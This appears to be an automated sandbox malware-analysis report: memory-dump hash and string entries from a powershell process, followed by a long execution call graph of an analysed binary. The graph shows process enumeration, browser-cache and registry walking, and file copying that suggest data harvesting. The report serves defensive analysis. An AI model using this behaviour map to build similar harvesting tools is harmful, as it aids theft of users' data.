                                                  • Opcode ID: eba404689188eab16cffbae19822cda54c0780ee434aec08f69d31dacd24d2e5
                                                  • Instruction ID: 496bc2c046c7a39069786ddbe230ade2699f02f94ce894cd15bb8376ffac76f3
                                                  • Opcode Fuzzy Hash: eba404689188eab16cffbae19822cda54c0780ee434aec08f69d31dacd24d2e5
                                                  • Instruction Fuzzy Hash: 859170B0A01209DFCB14CB68C085AAAB7F2BF89315F148469DA17AF756CB35DC62CF51
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.216295908565.00000000076F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_76f0000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 1l$4\2l$4\2l$@b2l$@b2l
                                                  • API String ID: 0-1364940662
                                                  • Opcode ID: 247569f0fed1a098678ee13b7fa61ac57d4c2452ff9e5e5a21b0d38f612ac85b
                                                  • Instruction ID: 9170ed7e3d34884f43d4f2c73627a9193f890a98287c0c6e3caa5cb997532b3a
                                                  • Opcode Fuzzy Hash: 247569f0fed1a098678ee13b7fa61ac57d4c2452ff9e5e5a21b0d38f612ac85b
                                                  • Instruction Fuzzy Hash: AE617DB4A01209DFDB14CF69C485AA9FBF2BF49314F18856AEA166B355CB31E891CF40
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.216295908565.00000000076F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_76f0000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: $I'k$?4l$?4l$?4l$G2l
                                                  • API String ID: 0-223816410
                                                  • Opcode ID: c3d1ffc726da3468dc3f558f91354599d27aa22894b24170b324507550722c01
                                                  • Instruction ID: 405e8941f89b2f6fa8004244bb35f3fedc069fc7793e15c69c11dce6ed87f6fa
                                                  • Opcode Fuzzy Hash: c3d1ffc726da3468dc3f558f91354599d27aa22894b24170b324507550722c01
                                                  • Instruction Fuzzy Hash: E911D6B9A052078FCB108B6D8402B6ABFE5AB82311F1480E9D6169B641D735C881CBD2
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.216295908565.00000000076F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_76f0000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: G2l$G2l$G2l$G2l
                                                  • API String ID: 0-601823172
                                                  • Opcode ID: de1ae58a82445745244e825d00cc733a14ff75c25177c47a0c3643e7fabcd4d4
                                                  • Instruction ID: 5ee462500f970d328c7d50dbd903a85a5af8b633a7985eb9f837214fc7be087e
                                                  • Opcode Fuzzy Hash: de1ae58a82445745244e825d00cc733a14ff75c25177c47a0c3643e7fabcd4d4
                                                  • Instruction Fuzzy Hash: 4ED149B17053469FCB259B78840166ABBE6AFC2211F1484BBDB57CF782CA35D841C7A1
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.216295908565.00000000076F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_76f0000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: P00l$P00l$\}-l$\}-l
                                                  • API String ID: 0-2237593516
                                                  • Opcode ID: 8e6c0ef036e0c4e0c474d97697e170c0b1b72eaf93729c3aa7ae181974109921
                                                  • Instruction ID: cfcb82a12df8bd0483b81a39b51077f7bf5592dba1a73728b3211cbbcb59c7fe
                                                  • Opcode Fuzzy Hash: 8e6c0ef036e0c4e0c474d97697e170c0b1b72eaf93729c3aa7ae181974109921
                                                  • Instruction Fuzzy Hash: 10913CB17043169FCB158E79C460B6EBBE6BFC5311F24806AEA069B395CA31DC41CFA1

                                                  Execution Graph

                                                  Execution Coverage:6.1%
                                                  Dynamic/Decrypted Code Coverage:9.2%
                                                  Signature Coverage:1.5%
                                                  Total number of Nodes:2000
                                                  Total number of Limit Nodes:60
memset 39223->39863 39225 404140 39877 40b1ab ??3@YAXPAX ??3@YAXPAX 39225->39877 39227 4040ec memset 39230 4040e0 39227->39230 39228 404148 39228->38991 39229 4099c6 2 API calls 39229->39230 39230->39225 39230->39227 39230->39229 39231 40a8ab 9 API calls 39230->39231 39231->39230 39890 40a6e6 WideCharToMultiByte 39232->39890 39234 4087ed 39891 4095d9 memset 39234->39891 39284 40b633 ??3@YAXPAX 39283->39284 39285 413d65 CreateToolhelp32Snapshot memset Process32FirstW 39284->39285 39286 413f00 Process32NextW 39285->39286 39287 413da5 OpenProcess 39286->39287 39288 413f17 FindCloseChangeNotification 39286->39288 39289 413df3 memset 39287->39289 39292 413eb0 39287->39292 39288->39029 40126 413f27 39289->40126 39291 413ebf ??3@YAXPAX 39291->39292 39292->39286 39292->39291 39293 4099f4 3 API calls 39292->39293 39293->39292 39295 413e37 GetModuleHandleW 39296 413e1f 39295->39296 39297 413e46 GetProcAddress 39295->39297 39296->39295 40131 413959 39296->40131 40147 413ca4 39296->40147 39297->39296 39299 413ea2 CloseHandle 39299->39292 39301 414c2e 16 API calls 39300->39301 39302 403eb7 39301->39302 39303 414c2e 16 API calls 39302->39303 39304 403ec5 39303->39304 39305 409d1f 6 API calls 39304->39305 39306 403ee2 39305->39306 39307 409d1f 6 API calls 39306->39307 39308 403efd 39307->39308 39309 409d1f 6 API calls 39308->39309 39310 403f15 39309->39310 39311 403af5 20 API calls 39310->39311 39312 403f29 39311->39312 39313 403af5 20 API calls 39312->39313 39314 403f3a 39313->39314 39315 40414f 33 API calls 39314->39315 39316 403f4f 39315->39316 39317 403faf 39316->39317 39319 403f5b memset 39316->39319 39321 4099c6 2 API calls 39316->39321 39322 40a8ab 9 API calls 39316->39322 40161 40b1ab ??3@YAXPAX ??3@YAXPAX 39317->40161 39319->39316 39320 403fb7 39320->38975 39321->39316 39322->39316 39324 414c2e 16 API calls 39323->39324 39325 403d26 39324->39325 39326 414c2e 16 API calls 39325->39326 39327 403d34 39326->39327 39328 409d1f 6 API calls 39327->39328 39329 403d51 
39328->39329 39330 409d1f 6 API calls 39329->39330 39331 403d6c 39330->39331 39332 409d1f 6 API calls 39331->39332 39333 403d84 39332->39333 39334 403af5 20 API calls 39333->39334 39335 403d98 39334->39335 39336 403af5 20 API calls 39335->39336 39337 403da9 39336->39337 39338 40414f 33 API calls 39337->39338 39339 403dbe 39338->39339 39340 403e1e 39339->39340 39341 403dca memset 39339->39341 39344 4099c6 2 API calls 39339->39344 39345 40a8ab 9 API calls 39339->39345 40162 40b1ab ??3@YAXPAX ??3@YAXPAX 39340->40162 39341->39339 39343 403e26 39343->38979 39344->39339 39345->39339 39347 414b81 9 API calls 39346->39347 39348 414c40 39347->39348 39349 414c73 memset 39348->39349 40163 409cea 39348->40163 39350 414c94 39349->39350 40166 414592 RegOpenKeyExW 39350->40166 39353 414c64 39353->38969 39355 414cc1 39356 414cf4 wcscpy 39355->39356 40167 414bb0 wcscpy 39355->40167 39356->39353 39358 414cd2 40168 4145ac RegQueryValueExW 39358->40168 39360 414ce9 RegCloseKey 39360->39356 39362 409d62 39361->39362 39363 409d43 wcscpy 39361->39363 39362->39011 39364 409719 2 API calls 39363->39364 39365 409d51 wcscat 39364->39365 39365->39362 39367 40aebe FindClose 39366->39367 39368 40ae21 39367->39368 39369 4099c6 2 API calls 39368->39369 39370 40ae35 39369->39370 39371 409d1f 6 API calls 39370->39371 39372 40ae49 39371->39372 39372->39046 39374 40ade0 39373->39374 39375 40ae0f 39373->39375 39374->39375 39376 40ade7 wcscmp 39374->39376 39375->39046 39376->39375 39377 40adfe wcscmp 39376->39377 39377->39375 39379 40ae18 9 API calls 39378->39379 39385 4453c4 39379->39385 39380 40ae51 9 API calls 39380->39385 39381 4453f3 39383 40aebe FindClose 39381->39383 39382 40add4 2 API calls 39382->39385 39384 4453fe 39383->39384 39384->39046 39385->39380 39385->39381 39385->39382 39386 445403 253 API calls 39385->39386 39386->39385 39388 40ae7b FindNextFileW 39387->39388 39389 40ae5c FindFirstFileW 39387->39389 39390 40ae94 39388->39390 39391 40ae8f 39388->39391 39389->39390 39393 40aeb6 
39390->39393 39394 409d1f 6 API calls 39390->39394 39392 40aebe FindClose 39391->39392 39392->39390 39393->39046 39394->39393 39396->39032 39397->39013 39398->39013 39399->39047 39401 409c89 39400->39401 39401->39069 39402->39099 39404 413d39 39403->39404 39405 413d2f FreeLibrary 39403->39405 39406 40b633 ??3@YAXPAX 39404->39406 39405->39404 39407 413d42 39406->39407 39408 40b633 ??3@YAXPAX 39407->39408 39409 413d4a 39408->39409 39409->38928 39410->38932 39411->38981 39412->38995 39414 44db70 39413->39414 39415 40b6fc memset 39414->39415 39416 409c70 2 API calls 39415->39416 39417 40b732 wcsrchr 39416->39417 39418 40b743 39417->39418 39419 40b746 memset 39417->39419 39418->39419 39420 40b2cc 27 API calls 39419->39420 39421 40b76f 39420->39421 39422 409d1f 6 API calls 39421->39422 39423 40b783 39422->39423 40169 409b98 GetFileAttributesW 39423->40169 39425 40b792 39426 40b7c2 39425->39426 39427 409c70 2 API calls 39425->39427 40170 40bb98 39426->40170 39429 40b7a5 39427->39429 39431 40b2cc 27 API calls 39429->39431 39435 40b7b2 39431->39435 39432 40b837 FindCloseChangeNotification 39434 40b83e memset 39432->39434 39433 40b817 40204 409a45 GetTempPathW 39433->40204 40203 40a6e6 WideCharToMultiByte 39434->40203 39438 409d1f 6 API calls 39435->39438 39438->39426 39439 40b827 CopyFileW 39439->39434 39440 40b866 39441 444432 121 API calls 39440->39441 39442 40b879 39441->39442 39443 40bad5 39442->39443 39444 40b273 27 API calls 39442->39444 39445 40baeb 39443->39445 39446 40bade DeleteFileW 39443->39446 39447 40b89a 39444->39447 39448 40b04b ??3@YAXPAX 39445->39448 39446->39445 39449 438552 134 API calls 39447->39449 39450 40baf3 39448->39450 39451 40b8a4 39449->39451 39450->39005 39452 40bacd 39451->39452 39454 4251c4 137 API calls 39451->39454 39453 443d90 111 API calls 39452->39453 39453->39443 39477 40b8b8 39454->39477 39455 40bac6 40216 424f26 123 API calls 39455->40216 39456 40b8bd memset 40207 425413 17 API calls 39456->40207 39459 425413 17 API calls 39459->39477 
39462 40a71b MultiByteToWideChar 39462->39477 39463 40a734 MultiByteToWideChar 39463->39477 39466 40b9b5 memcmp 39466->39477 39467 4099c6 2 API calls 39467->39477 39468 404423 37 API calls 39468->39477 39470 40bb3e memset memcpy 40217 40a734 MultiByteToWideChar 39470->40217 39471 4251c4 137 API calls 39471->39477 39474 40bb88 LocalFree 39474->39477 39477->39455 39477->39456 39477->39459 39477->39462 39477->39463 39477->39466 39477->39467 39477->39468 39477->39470 39477->39471 39478 40ba5f memcmp 39477->39478 40208 4253ef 16 API calls 39477->40208 40209 40b64c SystemTimeToFileTime FileTimeToLocalFileTime 39477->40209 40210 4253af 17 API calls 39477->40210 40211 4253cf 17 API calls 39477->40211 40212 447280 memset 39477->40212 40213 447960 memset memcpy memcpy memcpy 39477->40213 40214 40afe8 ??2@YAPAXI memcpy ??3@YAXPAX 39477->40214 40215 447920 memcpy memcpy memcpy 39477->40215 39478->39477 39479->39007 39481 40aed1 39480->39481 39482 40aec7 FindClose 39480->39482 39481->38940 39482->39481 39484 4099d7 39483->39484 39485 4099da memcpy 39483->39485 39484->39485 39485->38990 39487 40b2cc 27 API calls 39486->39487 39488 44543f 39487->39488 39489 409d1f 6 API calls 39488->39489 39490 44544f 39489->39490 40306 409b98 GetFileAttributesW 39490->40306 39492 44545e 39493 445476 39492->39493 39494 40b6ef 252 API calls 39492->39494 39495 40b2cc 27 API calls 39493->39495 39494->39493 39496 445482 39495->39496 39497 409d1f 6 API calls 39496->39497 39498 445492 39497->39498 40307 409b98 GetFileAttributesW 39498->40307 39500 4454a1 39501 4454b9 39500->39501 39502 40b6ef 252 API calls 39500->39502 39501->39021 39502->39501 39503->39020 39504->39037 39505->39043 39506->39080 39507->39062 39508->39107 39509->39107 39510->39090 39511->39118 39512->39120 39513->39122 39515 414c2e 16 API calls 39514->39515 39516 40c2ae 39515->39516 39586 40c1d3 39516->39586 39521 40c3be 39538 40a8ab 39521->39538 39522 40afcf 2 API calls 39523 40c2fd FindFirstUrlCacheEntryW 39522->39523 39524 40c3b6 
39523->39524 39525 40c31e wcschr 39523->39525 39526 40b04b ??3@YAXPAX 39524->39526 39527 40c331 39525->39527 39528 40c35e FindNextUrlCacheEntryW 39525->39528 39526->39521 39529 40a8ab 9 API calls 39527->39529 39528->39525 39530 40c373 GetLastError 39528->39530 39533 40c33e wcschr 39529->39533 39531 40c3ad FindCloseUrlCache 39530->39531 39532 40c37e 39530->39532 39531->39524 39534 40afcf 2 API calls 39532->39534 39533->39528 39535 40c34f 39533->39535 39536 40c391 FindNextUrlCacheEntryW 39534->39536 39537 40a8ab 9 API calls 39535->39537 39536->39525 39536->39531 39537->39528 39680 40a97a 39538->39680 39541 40a8cc 39541->39129 39686 40b1ab ??3@YAXPAX ??3@YAXPAX 39543->39686 39545 40c3dd 39546 40b2cc 27 API calls 39545->39546 39547 40c3e7 39546->39547 39687 414592 RegOpenKeyExW 39547->39687 39549 40c3f4 39550 40c50e 39549->39550 39551 40c3ff 39549->39551 39565 405337 39550->39565 39552 40a9ce 4 API calls 39551->39552 39553 40c418 memset 39552->39553 39688 40aa1d 39553->39688 39556 40c471 39558 40c47a _wcsupr 39556->39558 39557 40c505 RegCloseKey 39557->39550 39690 40a8d0 7 API calls 39558->39690 39560 40c498 39691 40a8d0 7 API calls 39560->39691 39562 40c4ac memset 39563 40aa1d 39562->39563 39564 40c4e4 RegEnumValueW 39563->39564 39564->39557 39564->39558 39692 405220 39565->39692 39569 4099c6 2 API calls 39568->39569 39570 40a714 _wcslwr 39569->39570 39571 40c634 39570->39571 39749 405361 39571->39749 39574 40c65c wcslen 39752 4053b6 39 API calls 39574->39752 39575 40c71d wcslen 39575->39139 39577 40c713 39755 4053df 39 API calls 39577->39755 39578 40c677 39578->39577 39753 40538b 39 API calls 39578->39753 39581 40c6a5 39581->39577 39582 40c6a9 memset 39581->39582 39583 40c6d3 39582->39583 39754 40c589 43 API calls 39583->39754 39585->39136 39587 40ae18 9 API calls 39586->39587 39593 40c210 39587->39593 39588 40ae51 9 API calls 39588->39593 39589 40c264 39590 40aebe FindClose 39589->39590 39592 40c26f 39590->39592 39591 40add4 2 API calls 39591->39593 39598 40e5ed 
memset memset 39592->39598 39593->39588 39593->39589 39593->39591 39594 40c231 _wcsicmp 39593->39594 39595 40c1d3 35 API calls 39593->39595 39594->39593 39596 40c248 39594->39596 39595->39593 39611 40c084 22 API calls 39596->39611 39599 414c2e 16 API calls 39598->39599 39600 40e63f 39599->39600 39601 409d1f 6 API calls 39600->39601 39602 40e658 39601->39602 39612 409b98 GetFileAttributesW 39602->39612 39604 40e667 39605 40e680 39604->39605 39607 409d1f 6 API calls 39604->39607 39613 409b98 GetFileAttributesW 39605->39613 39607->39605 39608 40e68f 39609 40c2d8 39608->39609 39614 40e4b2 39608->39614 39609->39521 39609->39522 39611->39593 39612->39604 39613->39608 39635 40e01e 39614->39635 39616 40e593 39618 40e5b0 39616->39618 39619 40e59c DeleteFileW 39616->39619 39617 40e521 39617->39616 39658 40e175 39617->39658 39620 40b04b ??3@YAXPAX 39618->39620 39619->39618 39621 40e5bb 39620->39621 39623 40e5c4 CloseHandle 39621->39623 39624 40e5cc 39621->39624 39623->39624 39626 40b633 ??3@YAXPAX 39624->39626 39625 40e573 39627 40e584 39625->39627 39628 40e57c FindCloseChangeNotification 39625->39628 39629 40e5db 39626->39629 39679 40b1ab ??3@YAXPAX ??3@YAXPAX 39627->39679 39628->39627 39632 40b633 ??3@YAXPAX 39629->39632 39631 40e540 39631->39625 39678 40e2ab 30 API calls 39631->39678 39633 40e5e3 39632->39633 39633->39609 39636 406214 22 API calls 39635->39636 39637 40e03c 39636->39637 39638 40e16b 39637->39638 39639 40dd85 74 API calls 39637->39639 39638->39617 39640 40e06b 39639->39640 39640->39638 39641 40afcf ??2@YAPAXI ??3@YAXPAX 39640->39641 39642 40e08d OpenProcess 39641->39642 39643 40e0a4 GetCurrentProcess DuplicateHandle 39642->39643 39647 40e152 39642->39647 39644 40e0d0 GetFileSize 39643->39644 39645 40e14a CloseHandle 39643->39645 39648 409a45 GetTempPathW GetWindowsDirectoryW GetTempFileNameW 39644->39648 39645->39647 39646 40e160 39650 40b04b ??3@YAXPAX 39646->39650 39647->39646 39649 406214 22 API calls 39647->39649 39651 40e0ea 39648->39651 39649->39646 
39650->39638 39652 4096dc CreateFileW 39651->39652 39653 40e0f1 CreateFileMappingW 39652->39653 39654 40e140 CloseHandle CloseHandle 39653->39654 39655 40e10b MapViewOfFile 39653->39655 39654->39645 39656 40e13b FindCloseChangeNotification 39655->39656 39657 40e11f WriteFile UnmapViewOfFile 39655->39657 39656->39654 39657->39656 39659 40e18c 39658->39659 39660 406b90 11 API calls 39659->39660 39661 40e19f 39660->39661 39662 40e1a7 memset 39661->39662 39663 40e299 39661->39663 39668 40e1e8 39662->39668 39664 4069a3 ??3@YAXPAX ??3@YAXPAX 39663->39664 39665 40e2a4 39664->39665 39665->39631 39666 406e8f 13 API calls 39666->39668 39667 406b53 SetFilePointerEx ReadFile 39667->39668 39668->39666 39668->39667 39669 40e283 39668->39669 39670 40dd50 _wcsicmp 39668->39670 39674 40742e 8 API calls 39668->39674 39675 40aae3 wcslen wcslen _memicmp 39668->39675 39676 40e244 _snwprintf 39668->39676 39671 40e291 39669->39671 39672 40e288 ??3@YAXPAX 39669->39672 39670->39668 39673 40aa04 ??3@YAXPAX 39671->39673 39672->39671 39673->39663 39674->39668 39675->39668 39677 40a8d0 7 API calls 39676->39677 39677->39668 39678->39631 39679->39616 39682 40a980 39680->39682 39681 40a8bb 39681->39541 39685 40a8d0 7 API calls 39681->39685 39682->39681 39683 40a995 _wcsicmp 39682->39683 39684 40a99c wcscmp 39682->39684 39683->39682 39684->39682 39685->39541 39686->39545 39687->39549 39689 40aa23 RegEnumValueW 39688->39689 39689->39556 39689->39557 39690->39560 39691->39562 39693 405335 39692->39693 39694 40522a 39692->39694 39693->39139 39695 40b2cc 27 API calls 39694->39695 39696 405234 39695->39696 39697 40a804 8 API calls 39696->39697 39698 40523a 39697->39698 39737 40b273 39698->39737 39700 405248 _mbscpy _mbscat GetProcAddress 39701 40b273 27 API calls 39700->39701 39702 405279 39701->39702 39740 405211 GetProcAddress 39702->39740 39704 405282 39705 40b273 27 API calls 39704->39705 39706 40528f 39705->39706 39741 405211 GetProcAddress 39706->39741 39708 405298 39738 40b58d 27 API calls 
39737->39738 39739 40b18c 39738->39739 39739->39700 39740->39704 39741->39708 39750 405220 39 API calls 39749->39750 39751 405369 39750->39751 39751->39574 39751->39575 39752->39578 39753->39581 39754->39577 39755->39575 39757 40440c FreeLibrary 39756->39757 39758 40436d 39757->39758 39759 40a804 8 API calls 39758->39759 39760 404377 39759->39760 39761 404383 39760->39761 39762 404405 39760->39762 39763 40b273 27 API calls 39761->39763 39762->39148 39762->39150 39762->39151 39764 40438d GetProcAddress 39763->39764 39765 40b273 27 API calls 39764->39765 39766 4043a7 GetProcAddress 39765->39766 39767 40b273 27 API calls 39766->39767 39768 4043ba GetProcAddress 39767->39768 39769 40b273 27 API calls 39768->39769 39777 404413 FreeLibrary 39776->39777 39778 40441e 39776->39778 39777->39778 39778->39165 39779->39157 39781 40442e 39780->39781 39782 40447e 39780->39782 39783 40b2cc 27 API calls 39781->39783 39782->39157 39784 404438 39783->39784 39794 4135f6 39793->39794 39795 4135eb FreeLibrary 39793->39795 39794->39168 39795->39794 39823 403a29 39822->39823 39837 403bed memset memset 39823->39837 39825 403ae7 39850 40b1ab ??3@YAXPAX ??3@YAXPAX 39825->39850 39826 403a3f memset 39832 403a2f 39826->39832 39828 403aef 39828->39204 39829 409b98 GetFileAttributesW 39829->39832 39830 40a8d0 7 API calls 39830->39832 39831 409d1f 6 API calls 39831->39832 39832->39825 39832->39826 39832->39829 39832->39830 39832->39831 39834 40a051 GetFileTime FindCloseChangeNotification 39833->39834 39835 4039ca CompareFileTime 39833->39835 39834->39835 39835->39204 39836->39203 39838 414c2e 16 API calls 39837->39838 39839 403c38 39838->39839 39840 409719 2 API calls 39839->39840 39841 403c3f wcscat 39840->39841 39842 414c2e 16 API calls 39841->39842 39843 403c61 39842->39843 39844 409719 2 API calls 39843->39844 39845 403c68 wcscat 39844->39845 39851 403af5 39845->39851 39848 403af5 20 API calls 39849 403c95 39848->39849 39849->39832 39850->39828 39852 403b02 39851->39852 39853 40ae18 9 API 
calls 39852->39853 39861 403b37 39853->39861 39854 403bdb 39856 40aebe FindClose 39854->39856 39855 40add4 wcscmp wcscmp 39855->39861 39857 403be6 39856->39857 39857->39848 39858 40ae18 9 API calls 39858->39861 39859 40ae51 9 API calls 39859->39861 39860 40aebe FindClose 39860->39861 39861->39854 39861->39855 39861->39858 39861->39859 39861->39860 39862 40a8d0 7 API calls 39861->39862 39862->39861 39864 409d1f 6 API calls 39863->39864 39865 404190 39864->39865 39878 409b98 GetFileAttributesW 39865->39878 39867 40419c 39868 4041a7 6 API calls 39867->39868 39869 40435c 39867->39869 39871 40424f 39868->39871 39869->39230 39871->39869 39872 40425e memset 39871->39872 39874 409d1f 6 API calls 39871->39874 39875 40a8ab 9 API calls 39871->39875 39879 414842 39871->39879 39872->39871 39873 404296 wcscpy 39872->39873 39873->39871 39874->39871 39876 4042b6 memset memset _snwprintf wcscpy 39875->39876 39876->39871 39877->39228 39878->39867 39882 41443e 39879->39882 39881 414866 39881->39871 39883 41444b 39882->39883 39884 414451 39883->39884 39885 4144a3 GetPrivateProfileStringW 39883->39885 39886 414491 39884->39886 39887 414455 wcschr 39884->39887 39885->39881 39888 414495 WritePrivateProfileStringW 39886->39888 39887->39886 39889 414463 _snwprintf 39887->39889 39888->39881 39889->39888 39890->39234 39892 40b2cc 27 API calls 39891->39892 39893 409615 39892->39893 39894 409d1f 6 API calls 39893->39894 39895 409625 39894->39895 40153 413f4f 40126->40153 40129 413f37 K32GetModuleFileNameExW 40130 413f4a 40129->40130 40130->39296 40132 413969 wcscpy 40131->40132 40133 41396c wcschr 40131->40133 40145 413a3a 40132->40145 40133->40132 40135 41398e 40133->40135 40158 4097f7 wcslen wcslen _memicmp 40135->40158 40137 41399a 40138 4139a4 memset 40137->40138 40139 4139e6 40137->40139 40159 409dd5 GetWindowsDirectoryW wcscpy 40138->40159 40141 413a31 wcscpy 40139->40141 40142 4139ec memset 40139->40142 40141->40145 40160 409dd5 GetWindowsDirectoryW wcscpy 40142->40160 40143 4139c9 
wcscpy wcscat 40143->40145 40145->39296 40146 413a11 memcpy wcscat 40146->40145 40148 413cb0 GetModuleHandleW 40147->40148 40149 413cda 40147->40149 40148->40149 40150 413cbf GetProcAddress 40148->40150 40151 413ce3 GetProcessTimes 40149->40151 40152 413cf6 40149->40152 40150->40149 40151->39299 40152->39299 40154 413f2f 40153->40154 40155 413f54 40153->40155 40154->40129 40154->40130 40156 40a804 8 API calls 40155->40156 40157 413f5f GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 40156->40157 40157->40154 40158->40137 40159->40143 40160->40146 40161->39320 40162->39343 40164 409cf9 GetVersionExW 40163->40164 40165 409d0a 40163->40165 40164->40165 40165->39349 40165->39353 40166->39355 40167->39358 40168->39360 40169->39425 40171 40bba5 40170->40171 40218 40cc26 40171->40218 40174 40bd4b 40239 40cc0c 40174->40239 40179 40b2cc 27 API calls 40180 40bbef 40179->40180 40246 40ccf0 _wcsicmp 40180->40246 40182 40bbf5 40182->40174 40247 40ccb4 6 API calls 40182->40247 40184 40bc26 40185 40cf04 17 API calls 40184->40185 40186 40bc2e 40185->40186 40187 40bd43 40186->40187 40188 40b2cc 27 API calls 40186->40188 40189 40cc0c 4 API calls 40187->40189 40190 40bc40 40188->40190 40189->40174 40248 40ccf0 _wcsicmp 40190->40248 40192 40bc46 40192->40187 40193 40bc61 memset memset WideCharToMultiByte 40192->40193 40249 40103c strlen 40193->40249 40195 40bcc0 40196 40b273 27 API calls 40195->40196 40197 40bcd0 memcmp 40196->40197 40197->40187 40198 40bce2 40197->40198 40199 404423 37 API calls 40198->40199 40200 40bd10 40199->40200 40200->40187 40201 40bd3a LocalFree 40200->40201 40202 40bd1f memcpy 40200->40202 40201->40187 40202->40201 40203->39440 40205 409a74 GetTempFileNameW 40204->40205 40206 409a66 GetWindowsDirectoryW 40204->40206 40205->39439 40206->40205 40207->39477 40208->39477 40209->39477 40210->39477 40211->39477 40212->39477 40213->39477 40214->39477 40215->39477 40216->39452 40217->39474 40250 4096c3 CreateFileW 40218->40250 40220 40cc34 
40221 40cc3d GetFileSize 40220->40221 40229 40bbca 40220->40229 40222 40afcf 2 API calls 40221->40222 40223 40cc64 40222->40223 40251 40a2ef ReadFile 40223->40251 40225 40cc71 40252 40ab4a MultiByteToWideChar 40225->40252 40227 40cc95 FindCloseChangeNotification 40228 40b04b ??3@YAXPAX 40227->40228 40228->40229 40229->40174 40230 40cf04 40229->40230 40231 40b633 ??3@YAXPAX 40230->40231 40232 40cf14 40231->40232 40258 40b1ab ??3@YAXPAX ??3@YAXPAX 40232->40258 40234 40bbdd 40234->40174 40234->40179 40235 40cf1b 40235->40234 40237 40cfef 40235->40237 40259 40cd4b 40235->40259 40238 40cd4b 14 API calls 40237->40238 40238->40234 40240 40b633 ??3@YAXPAX 40239->40240 40241 40cc15 40240->40241 40242 40aa04 ??3@YAXPAX 40241->40242 40243 40cc1d 40242->40243 40305 40b1ab ??3@YAXPAX ??3@YAXPAX 40243->40305 40245 40b7d4 memset CreateFileW 40245->39432 40245->39433 40246->40182 40247->40184 40248->40192 40249->40195 40250->40220 40251->40225 40253 40ab93 40252->40253 40254 40ab6b 40252->40254 40253->40227 40255 40a9ce 4 API calls 40254->40255 40256 40ab74 40255->40256 40257 40ab7c MultiByteToWideChar 40256->40257 40257->40253 40258->40235 40260 40cd7b 40259->40260 40293 40aa29 6 API calls 40260->40293 40262 40cef5 40263 40aa04 ??3@YAXPAX 40262->40263 40264 40cefd 40263->40264 40264->40235 40265 40cd89 40265->40262 40294 40aa29 6 API calls 40265->40294 40267 40ce1d 40295 40aa29 6 API calls 40267->40295 40269 40ce3e 40270 40ce6a 40269->40270 40296 40abb7 wcslen memmove 40269->40296 40271 40ce9f 40270->40271 40299 40abb7 wcslen memmove 40270->40299 40302 40a8d0 7 API calls 40271->40302 40274 40ce56 40297 40aa71 wcslen 40274->40297 40276 40ceb5 40303 40a8d0 7 API calls 40276->40303 40278 40ce8b 40300 40aa71 wcslen 40278->40300 40280 40ce5e 40298 40abb7 wcslen memmove 40280->40298 40281 40ce93 40301 40abb7 wcslen memmove 40281->40301 40285 40cecb 40304 40d00b malloc memcpy ??3@YAXPAX ??3@YAXPAX 40285->40304 40287 40cedd 40288 40aa04 ??3@YAXPAX 40287->40288 40289 40cee5 40288->40289 
40290 40aa04 ??3@YAXPAX 40289->40290 40291 40ceed 40290->40291 40292 40aa04 ??3@YAXPAX 40291->40292 40292->40262 40293->40265 40294->40267 40295->40269 40296->40274 40297->40280 40298->40270 40299->40278 40300->40281 40301->40271 40302->40276 40303->40285 40304->40287 40305->40245 40306->39492 40307->39500 37667 44dea5 37668 44deb5 FreeLibrary 37667->37668 37669 44dec3 37667->37669 37668->37669 40317 4148b6 FindResourceW 40318 4148cf SizeofResource 40317->40318 40321 4148f9 40317->40321 40319 4148e0 LoadResource 40318->40319 40318->40321 40320 4148ee LockResource 40319->40320 40319->40321 40320->40321 37843 415304 ??3@YAXPAX 40322 441b3f 40332 43a9f6 40322->40332 40324 441b61 40505 4386af memset 40324->40505 40326 44189a 40327 4418e2 40326->40327 40331 442bd4 40326->40331 40328 4418ea 40327->40328 40506 4414a9 12 API calls 40327->40506 40331->40328 40507 441409 memset 40331->40507 40333 43aa20 40332->40333 40334 43aadf 40332->40334 40333->40334 40335 43aa34 memset 40333->40335 40334->40324 40336 43aa56 40335->40336 40337 43aa4d 40335->40337 40508 43a6e7 40336->40508 40516 42c02e memset 40337->40516 40342 43aad3 40518 4169a7 11 API calls 40342->40518 40343 43aaae 40343->40334 40343->40342 40358 43aae5 40343->40358 40344 43ac18 40347 43ac47 40344->40347 40520 42bbd5 memcpy memcpy memcpy memset memcpy 40344->40520 40348 43aca8 40347->40348 40521 438eed 16 API calls 40347->40521 40352 43acd5 40348->40352 40523 4233ae 11 API calls 40348->40523 40351 43ac87 40522 4233c5 16 API calls 40351->40522 40524 423426 11 API calls 40352->40524 40356 43ace1 40525 439811 163 API calls 40356->40525 40357 43a9f6 161 API calls 40357->40358 40358->40334 40358->40344 40358->40357 40519 439bbb 22 API calls 40358->40519 40360 43acfd 40365 43ad2c 40360->40365 40526 438eed 16 API calls 40360->40526 40362 43ad19 40527 4233c5 16 API calls 40362->40527 40364 43ad58 40528 44081d 163 API calls 40364->40528 40365->40364 40368 43add9 40365->40368 40532 423426 11 API calls 40368->40532 40369 43ae3a 
